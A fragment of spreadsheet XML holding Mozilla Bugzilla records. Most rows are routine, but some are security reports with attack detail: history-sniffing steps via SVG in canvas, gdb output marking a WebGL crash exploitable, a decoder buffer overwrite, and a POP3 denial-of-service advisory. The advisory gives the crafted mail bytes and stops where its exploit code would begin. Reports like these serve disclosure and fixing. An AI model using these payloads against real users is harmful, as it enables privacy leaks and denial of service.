      <c r="J5832" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K5832" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5832" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5832" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N5832" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5832" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5832" t="inlineStr"/>
      <c r="Q5832" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5832" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5832" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T5832" t="n">
        <v>1</v>
      </c>
      <c r="U5832" t="n">
        <v>0</v>
      </c>
      <c r="V5832" t="n">
        <v>23</v>
      </c>
      <c r="W5832" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-71b97d12-f53d-4d26-8f5a-906ab0180405.
=============================================================
Top 10 frames of crashing thread:
0 xul.dll mozilla::dom::XULDocument::LoadOverlayInternal dom/xul/XULDocument.cpp:2274
1 xul.dll mozilla::dom::XULDocument::LoadOverlay dom/xul/XULDocument.cpp:2244
2 xul.dll static bool mozilla::dom::XULDocumentBinding::loadOverlay dom/bindings/XULDocumentBinding.cpp:723
3 xul.dll mozilla::dom::GenericBindingMethod dom/bindings/BindingUtils.cpp:3032
4 xul.dll js::InternalCallOrConstruct js/src/vm/Interpreter.cpp:467
5 xul.dll static bool Interpret js/src/vm/Interpreter.cpp:3084
6 xul.dll js::RunScript js/src/vm/Interpreter.cpp:417
7 xul.dll js::ExecuteKernel js/src/vm/Interpreter.cpp:700
8 xul.dll js::Execute js/src/vm/Interpreter.cpp:732
9 xul.dll JS::CloneAndExecuteScript js/src/jsapi.cpp:4765
=============================================================
There are 10 crashes (from 3 installations) in nightly 61 with buildid 20180404224504. In analyzing the backtrace, the regression may have been introduced by patch [1] to fix bug 1448162.
[1] https://hg.mozilla.org/mozilla-central/rev?node=61c57ad4f4f4</t>
        </is>
      </c>
      <c r="X5832" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5833">
      <c r="A5833" t="n">
        <v>110936</v>
      </c>
      <c r="B5833" t="inlineStr">
        <is>
          <t>2001-11-19 23:11:50 -0800</t>
        </is>
      </c>
      <c r="C5833" t="inlineStr">
        <is>
          <t>Reviewers' Guide</t>
        </is>
      </c>
      <c r="D5833" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E5833" t="n">
        <v>1</v>
      </c>
      <c r="F5833" t="n">
        <v>1</v>
      </c>
      <c r="G5833" t="n">
        <v>4</v>
      </c>
      <c r="H5833" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5833" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5833" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K5833" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L5833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5833" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5833" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5833" t="inlineStr"/>
      <c r="Q5833" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5833" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5833" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5833" t="n">
        <v>1</v>
      </c>
      <c r="U5833" t="n">
        <v>0</v>
      </c>
      <c r="V5833" t="n">
        <v>3</v>
      </c>
      <c r="W5833" t="inlineStr">
        <is>
          <t>We should include a Bugzilla reviewers' guide with the Bugzilla guide.
Thoughts of what to include:
- Brief description of first-review, second-review statuses and needs-work
statuses.
- You can mark both first and second review if you think the patch is low risk
and doesn't need a separate second review.
- You should check the patch fulfils the criteria set out in the Hackers' Guide.
- You should test the patch and well as visually inspect it.
There's lots of bugs about adding stuff to the Hackers' Guide, but which haven't
been added yet, so before adding stuff here consider whether you should add
stuff to the Hackers' Guide rather than the Reviewers' Guide.</t>
        </is>
      </c>
      <c r="X5833" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5834">
      <c r="A5834" t="n">
        <v>615787</v>
      </c>
      <c r="B5834" t="inlineStr">
        <is>
          <t>2010-11-30 19:05:06 -0800</t>
        </is>
      </c>
      <c r="C5834" t="inlineStr">
        <is>
          <t>Document._clean_category() without an ID updates all docs without parents :(</t>
        </is>
      </c>
      <c r="D5834" t="inlineStr">
        <is>
          <t>2010-12-01 14:11:16 -0800</t>
        </is>
      </c>
      <c r="E5834" t="n">
        <v>1</v>
      </c>
      <c r="F5834" t="n">
        <v>1</v>
      </c>
      <c r="G5834" t="n">
        <v>5</v>
      </c>
      <c r="H5834" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5834" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5834" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K5834" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5834" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5834" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5834" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5834" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5834" t="inlineStr"/>
      <c r="Q5834" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5834" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5834" t="inlineStr">
        <is>
          <t>2.3.1</t>
        </is>
      </c>
      <c r="T5834" t="n">
        <v>1</v>
      </c>
      <c r="U5834" t="n">
        <v>0</v>
      </c>
      <c r="V5834" t="n">
        <v>8</v>
      </c>
      <c r="W5834" t="inlineStr">
        <is>
          <t>Articles are created with 'troubleshooting', as we migrated articles. For unknown reasons the categories are flipping. At last count all articles had been flipped to the 'Navigation' category.</t>
        </is>
      </c>
      <c r="X5834" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5835">
      <c r="A5835" t="n">
        <v>1420001</v>
      </c>
      <c r="B5835" t="inlineStr">
        <is>
          <t>2017-11-22 18:28:12 -0800</t>
        </is>
      </c>
      <c r="C5835" t="inlineStr">
        <is>
          <t>History leakage through anchors in SVG in canvas tags</t>
        </is>
      </c>
      <c r="D5835" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:46 -0700</t>
        </is>
      </c>
      <c r="E5835" t="n">
        <v>1</v>
      </c>
      <c r="F5835" t="n">
        <v>1</v>
      </c>
      <c r="G5835" t="n">
        <v>3</v>
      </c>
      <c r="H5835" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5835" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5835" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K5835" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L5835" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5835" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5835" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5835" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5835" t="inlineStr">
        <is>
          <t>[regression from stylo][adv-main57+][adv-esr52.5.1+]</t>
        </is>
      </c>
      <c r="Q5835" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5835" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5835" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T5835" t="n">
        <v>1</v>
      </c>
      <c r="U5835" t="n">
        <v>0</v>
      </c>
      <c r="V5835" t="n">
        <v>26</v>
      </c>
      <c r="W5835" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20171120142222
Steps to reproduce:
Demo:  http://homepages.cs.ncl.ac.uk/dan.jackson/avisited/
...you may need to reload a couple of times to make it work.
1. Place an &lt;a&gt; tag for each history sniffing attempt in an external SVG document (within a 'foreignObject' tag)
2. Create an &lt;img&gt; that references the SVG file
3. Draws that image to a &lt;canvas&gt; element
4. Try one/both of:
  a. look through the pixels to find the a:visited colour; or
  b. save the canvas as a (PNG) Blob to see if there is a file size difference (the unvisited colour is the same as the background colour, resulting in a smaller file).
Actual results:
The page is (at least after reloading) able to determine URLs I have previously visited.
Expected results:
The page should not be able to sniff the user's browsing history.
In particular, it looks like other browsers render "a:visited" the same as "a" when drawing SVG to an image.</t>
        </is>
      </c>
      <c r="X5835" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5836">
      <c r="A5836" t="n">
        <v>972131</v>
      </c>
      <c r="B5836" t="inlineStr">
        <is>
          <t>2014-02-12 17:52:44 -0800</t>
        </is>
      </c>
      <c r="C5836" t="inlineStr">
        <is>
          <t>Update signing server whitelists</t>
        </is>
      </c>
      <c r="D5836" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E5836" t="n">
        <v>1</v>
      </c>
      <c r="F5836" t="n">
        <v>1</v>
      </c>
      <c r="G5836" t="n">
        <v>5</v>
      </c>
      <c r="H5836" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5836" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5836" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5836" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5836" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5836" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5836" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5836" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5836" t="inlineStr"/>
      <c r="Q5836" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5836" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5836" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5836" t="n">
        <v>1</v>
      </c>
      <c r="U5836" t="n">
        <v>0</v>
      </c>
      <c r="V5836" t="n">
        <v>3</v>
      </c>
      <c r="W5836" t="inlineStr">
        <is>
          <t>Created attachment 8375240
Organize and correct IP ranges
... to reflect the actual state.
Per https://mana.mozilla.org/wiki/display/NOC/VLAN+assignments#VLANassignments-Releng (which was used to setup subnets in AWS and mirror them in bug 959592 to the inventory) the following IP subnets are build, try and srv.</t>
        </is>
      </c>
      <c r="X5836" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5837">
      <c r="A5837" t="n">
        <v>1199923</v>
      </c>
      <c r="B5837" t="inlineStr">
        <is>
          <t>2015-08-29 07:25:31 -0700</t>
        </is>
      </c>
      <c r="C5837" t="inlineStr">
        <is>
          <t>Possible stack corruption with WebGL shaders</t>
        </is>
      </c>
      <c r="D5837" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:57 -0700</t>
        </is>
      </c>
      <c r="E5837" t="n">
        <v>1</v>
      </c>
      <c r="F5837" t="n">
        <v>1</v>
      </c>
      <c r="G5837" t="n">
        <v>3</v>
      </c>
      <c r="H5837" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5837" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5837" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5837" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L5837" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5837" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5837" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5837" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5837" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main45+] can force user to reboot machine</t>
        </is>
      </c>
      <c r="Q5837" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5837" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5837" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T5837" t="n">
        <v>1</v>
      </c>
      <c r="U5837" t="n">
        <v>0</v>
      </c>
      <c r="V5837" t="n">
        <v>25</v>
      </c>
      <c r="W5837" t="inlineStr">
        <is>
          <t>Created attachment 8654514
testcase.html
User Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0
Build ID: 20150828123452
Steps to reproduce:
Test on:
OS: Linux Ubuntu 14.04 LTS  x86
memory: 2GB
Processor: Intel® Core™ i5-2400 CPU @ 3.10GHz × 4 
Firefox build: 43.0a1 (2015-08-28) Firefox nightly
Load testcase.html
Actual results:
Program received signal SIGPIPE, Broken pipe.
[Switching to Thread 0xafbffb40 (LWP 5040)]
0xb7fdd424 in ?? ()
(gdb) 
(gdb) 
(gdb) 
(gdb) Done sleeping...
(gdb) bt
#0  0xb7fdd424 in ?? ()
#1  0xb1989a0a in ?? () from /home/hidan/ff/firefox/libxul.so
#2  0xb197327c in ?? () from /home/hidan/ff/firefox/libxul.so
#3  0xb1978963 in ?? () from /home/hidan/ff/firefox/libxul.so
#4  0xb1978af7 in ?? () from /home/hidan/ff/firefox/libxul.so
#5  0xb19729c4 in ?? () from /home/hidan/ff/firefox/libxul.so
#6  0xb1973b18 in ?? () from /home/hidan/ff/firefox/libxul.so
#7  0xb1973b3e in ?? () from /home/hidan/ff/firefox/libxul.so
#8  0xb197c6cc in ?? () from /home/hidan/ff/firefox/libxul.so
#9  0xb1978fe8 in ?? () from /home/hidan/ff/firefox/libxul.so
#10 0xb7faff70 in start_thread (arg=0xafbffb40) at pthread_create.c:312
#11 0xb7d8b70e in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:129
(gdb) i r
eax            0xffffffe0	-32
ecx            0xafbfebf0	-1346376720
edx            0xb6617d60	-1235124896
ebx            0x10	16
esp            0xafbfebd8	0xafbfebd8
ebp            0xafbff058	0xafbff058
esi            0x0	0
edi            0xafbfec4c	-1346376628
eip            0xb7fdd424	0xb7fdd424
eflags         0x200293	[ CF AF SF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) exploitable
Description: Possible stack corruption
Short description: PossibleStackCorruption (7/22)
Hash: 0e927d7f07bff32e2ed81d34aef68ae9.5a355df4001f81c4ed3369028d229b6d
Exploitability Classification: EXPLOITABLE
Explanation: GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.
Other tags: UncategorizedSignal (22/22)
(gdb) where
#0  0xb7fdd424 in ?? ()
#1  0xb1989a0a in ?? () from /home/hidan/ff/firefox/libxul.so
#2  0xb197327c in ?? () from /home/hidan/ff/firefox/libxul.so
#3  0xb1978963 in ?? () from /home/hidan/ff/firefox/libxul.so
#4  0xb1978af7 in ?? () from /home/hidan/ff/firefox/libxul.so
#5  0xb19729c4 in ?? () from /home/hidan/ff/firefox/libxul.so
#6  0xb1973b18 in ?? () from /home/hidan/ff/firefox/libxul.so
#7  0xb1973b3e in ?? () from /home/hidan/ff/firefox/libxul.so
#8  0xb197c6cc in ?? () from /home/hidan/ff/firefox/libxul.so
#9  0xb1978fe8 in ?? () from /home/hidan/ff/firefox/libxul.so
#10 0xb7faff70 in start_thread (arg=0xafbffb40) at pthread_create.c:312
#11 0xb7d8b70e in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:129</t>
        </is>
      </c>
      <c r="X5837" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5838">
      <c r="A5838" t="n">
        <v>563618</v>
      </c>
      <c r="B5838" t="inlineStr">
        <is>
          <t>2010-05-04 03:42:59 -0700</t>
        </is>
      </c>
      <c r="C5838" t="inlineStr">
        <is>
          <t>Crash due to writing past the end of buffer [@ nsEUCJPToUnicodeV2::Convert]</t>
        </is>
      </c>
      <c r="D5838" t="inlineStr">
        <is>
          <t>2011-05-18 18:19:34 -0700</t>
        </is>
      </c>
      <c r="E5838" t="n">
        <v>1</v>
      </c>
      <c r="F5838" t="n">
        <v>1</v>
      </c>
      <c r="G5838" t="n">
        <v>3</v>
      </c>
      <c r="H5838" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5838" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5838" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K5838" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5838" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5838" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5838" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5838" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5838" t="inlineStr">
        <is>
          <t>[sg:critical?][critsmash:resolved] [qa-examined-192] [qa-examined-191] [qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q5838" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5838" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5838" t="inlineStr">
        <is>
          <t>mozilla2.0</t>
        </is>
      </c>
      <c r="T5838" t="n">
        <v>1</v>
      </c>
      <c r="U5838" t="n">
        <v>0</v>
      </c>
      <c r="V5838" t="n">
        <v>19</v>
      </c>
      <c r="W5838" t="inlineStr">
        <is>
          <t>No steps to reproduce; filed based on a crash stack.
nsJapaneseToUnicode.cpp has these lines:
367               *dest++ = 0xFFFD;             
368               // if 0x8e is not followed by a valid JIS X 0201 byte
369               // but by a valid US-ASCII, save it instead of eating it up.
370               if ( (PRUint8)*src &lt; (PRUint8)0x7f )
371                  *dest++ = (PRUnichar) *src;
The destination pointer is incremented on line 367 and then written to again on line 371 without first checking if the increment reached the end of the buffer. When the increment on line 367 reaches the end of the buffer, line 371 crashes.
Even though this was already discussed on #developers, I'm marking this is as security sensitive in case the write past the buffer could be used to deliberately write something to the heap.</t>
        </is>
      </c>
      <c r="X5838" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5839">
      <c r="A5839" t="n">
        <v>428672</v>
      </c>
      <c r="B5839" t="inlineStr">
        <is>
          <t>2008-04-12 08:17:41 -0700</t>
        </is>
      </c>
      <c r="C5839" t="inlineStr">
        <is>
          <t>XSS using an event handler attached to the outer window</t>
        </is>
      </c>
      <c r="D5839" t="inlineStr">
        <is>
          <t>2008-08-17 17:02:55 -0700</t>
        </is>
      </c>
      <c r="E5839" t="n">
        <v>1</v>
      </c>
      <c r="F5839" t="n">
        <v>1</v>
      </c>
      <c r="G5839" t="n">
        <v>3</v>
      </c>
      <c r="H5839" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5839" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5839" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5839" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5839" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5839" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5839" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5839" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5839" t="inlineStr">
        <is>
          <t>[sg:high xss] fixed on branch by 432591</t>
        </is>
      </c>
      <c r="Q5839" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5839" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5839" t="inlineStr">
        <is>
          <t>mozilla1.9</t>
        </is>
      </c>
      <c r="T5839" t="n">
        <v>1</v>
      </c>
      <c r="U5839" t="n">
        <v>0</v>
      </c>
      <c r="V5839" t="n">
        <v>29</v>
      </c>
      <c r="W5839" t="inlineStr">
        <is>
          <t>If an event handler attribute is set on &lt;body&gt; element in a document that has
already been unloaded, an event handler function is attached to the outer
window.  This allows an attacker to perform an XSS attack.</t>
        </is>
      </c>
      <c r="X5839" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5840">
      <c r="A5840" t="n">
        <v>988106</v>
      </c>
      <c r="B5840" t="inlineStr">
        <is>
          <t>2014-03-25 18:41:37 -0700</t>
        </is>
      </c>
      <c r="C5840" t="inlineStr">
        <is>
          <t>Debugger unwraps window Xrays, then tries to call DOM methods on the result</t>
        </is>
      </c>
      <c r="D5840" t="inlineStr">
        <is>
          <t>2018-06-13 10:25:03 -0700</t>
        </is>
      </c>
      <c r="E5840" t="n">
        <v>1</v>
      </c>
      <c r="F5840" t="n">
        <v>1</v>
      </c>
      <c r="G5840" t="n">
        <v>3</v>
      </c>
      <c r="H5840" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5840" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J5840" t="inlineStr">
        <is>
          <t>Debugger</t>
        </is>
      </c>
      <c r="K5840" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5840" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5840" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5840" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5840" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5840" t="inlineStr">
        <is>
          <t>[qa-][adv-main29+]</t>
        </is>
      </c>
      <c r="Q5840" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5840" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5840" t="inlineStr">
        <is>
          <t>Firefox 31</t>
        </is>
      </c>
      <c r="T5840" t="n">
        <v>1</v>
      </c>
      <c r="U5840" t="n">
        <v>0</v>
      </c>
      <c r="V5840" t="n">
        <v>18</v>
      </c>
      <c r="W5840" t="inlineStr">
        <is>
          <t>ccing people who seem to have review/code blame for the relevant bits over time...
In toolkit/devtools/server/actors/script.js we have this bit:
451   this.global = this.globalSafe = aGlobal;
452   if (aGlobal &amp;&amp; aGlobal.wrappedJSObject) {
453     this.global = aGlobal.wrappedJSObject;
454   }
and then various now-unsafe uses of this.global (ones where the page can just control what the methods return; I've included the ones where it's obvious that this.global flows into the expression):
1746     let nodes = this.global.document.getElementsByTagName("*");
...
1764         let selector = node.tagName ? findCssSelector(node) : "window";
...
1774         listenerForm.isEventHandler = !!node["on" + listenerForm.type];
...
and most importantly for purposes of bug 789261:
5385 function getInnerId(window) {
5386   return window.QueryInterface(Ci.nsIInterfaceRequestor).
5387                 getInterface(Ci.nsIDOMWindowUtils).currentInnerWindowID;
5388 };
Why exactly are we working with the unwrapped object here?  The blame for the .wrappedJSObject bit goes back a ways; I tracked it to at least http://hg.mozilla.org/mozilla-central/rev/81e2e423fc63
Bug 901930 added the globalSafe bit, but only used it for toString, not all the other places this code is poking at.
For the other uses above, they all seem to date back to &lt;http://hg.mozilla.org/mozilla-central/rev/5d860e628af6&gt;, so at least ESR24 is not affected, but every other branch we have is, in case people feel this needs backporting.  How much of a security problem this is in practice is hard to tell, of course.
My gut instinct here is to just nix globalSafe and drop the .wrappedJSObject thing completely, but is there a _reason_ we want the non-Xray window here, exactly?</t>
        </is>
      </c>
      <c r="X5840" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5841">
      <c r="A5841" t="n">
        <v>144228</v>
      </c>
      <c r="B5841" t="inlineStr">
        <is>
          <t>2002-05-13 12:30:33 -0700</t>
        </is>
      </c>
      <c r="C5841" t="inlineStr">
        <is>
          <t>Malicious email breaks POP server connection</t>
        </is>
      </c>
      <c r="D5841" t="inlineStr">
        <is>
          <t>2008-07-31 01:24:57 -0700</t>
        </is>
      </c>
      <c r="E5841" t="n">
        <v>1</v>
      </c>
      <c r="F5841" t="n">
        <v>1</v>
      </c>
      <c r="G5841" t="n">
        <v>3</v>
      </c>
      <c r="H5841" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5841" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J5841" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5841" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5841" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5841" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5841" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5841" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5841" t="inlineStr">
        <is>
          <t>[ADT1 RTM]</t>
        </is>
      </c>
      <c r="Q5841" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5841" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5841" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T5841" t="n">
        <v>1</v>
      </c>
      <c r="U5841" t="n">
        <v>0</v>
      </c>
      <c r="V5841" t="n">
        <v>26</v>
      </c>
      <c r="W5841" t="inlineStr">
        <is>
          <t>Reported by eldre8@afturgurluk.org:
-------------------------------------
Hi,
I have found a bug is mozilla,
involving the retreiving part of it,
it can block the retreiving of the mail box, and the only way is
to use telnet to delete the bad mail or, using others mailclient.
the blocking effect is due to mishandling of \r\n, for more information
use the C code that I have join in the bottom of this mail.
I have wrote all the info in this little text, I will not distribute
this text until the bug gets fix, and when it will, the code will
be corrupt to not let some "script kiddies" plays at DoSing anyone...
Apart from this, Mozilla is great! :]
////////////////////////////////////////////
///// Strange Software Behaviour Reports #1 of eldre8@afturgurluk.org
///
//// discovered, understood and exploited between 05, 08 2001
//// (yes, i took the time... :) )
\/\/\_/-&gt; System affected:
        All versions of Netscape
        All versions of Mozilla (even the 2002041711)
^\/\/'\-&gt; System not affected:
        Outlook Express
        Outlook 2000
        IncrediMail(thks to ben81 for testing)
|_/\/\\/&gt; Buggy software team contacted about this: in process...
/\/\/\_/&gt; Exploitation: remote &amp; very easy &amp; very anonymous :(
_/\/\/\_&gt; Effects: With this remote hole, we can block any mail
        box that is checked with a pop3 client, so the
        hotmail, caramail like servers are not affected.
        A mail will cause the pop3 client to desynchronize
        with the server, losing the connection to it, and
        so, leaves all messages on the server (explain later)...
        In Netscape, we could only see the header of the message,
        in Mozilla, we could see the begin of the mail message...
-/\/\/\/&gt; Explanation: In the SMTP protocol, we can send mail with
        some introduction command (ehlo,mail,rcpt) and then
        type our messages and place a dot at a new line to
        specify to the MTA that it is the end of the message.
        On the other side, when a POP3 client check mail, it
        connect to the server, retreive the mail, it terminate
        the download of a message when it sees a dot at a new line.
        And here is the trick.
        If we can place a dot at a new line, and place other
        words below this dot, the client will beleive the mail
        is finished and will try to download next messages, thus
        beiing desynchronize with the server...
        The POP3 client act as:
            login on to the POP3 server
            retrieve mails
            delete mails
            logout
        but if it is desynchronize, it will retreive mail, and
        disconnect, thus didn't delete mails, and the next time
        it login, it will refind the same mail, will retreive one
        more time the mails, disconnect, and other and other...
        A more detailed explanation,
        here it is a simple end of a normal mail:
            blabla...
            \x0a
            \x0a
        and this is the bad mail:
            blabla...
            \x0a\x0d\x2e\x0d\x20\x0a\x0a\x0a
            blabla...
            \x0a\x20\x00
            \x0a
        We can see at the end of the two 0x0a, it seems that it is just
        place here by the console...forget it.
        At this stage, you could catch the bug...
        Bad implementation of \r\n ?
=\/\/\/-&gt; Possible fixes: There are different ways to fix this,
        - one way is from the client, to stop the bad mail,
            this is to connect manually via telnet to the pop3
            server, and then identify the bad message and do a
            dele &lt;# of the message&gt;
        - one better way is to fix this from the client itself,
            the client can get the size of each messages via
            the list command, so it should be able to retrieve
            the complete message, not less, not more...
        - one way is to fix the MTA so it will not accept such
            the code below...
~\/\/\/~&gt; Exploit:
/* this is the code that comes with my
 * advisory #1 to illustrate this...
 * eldre8@afturgurluk.org
 */
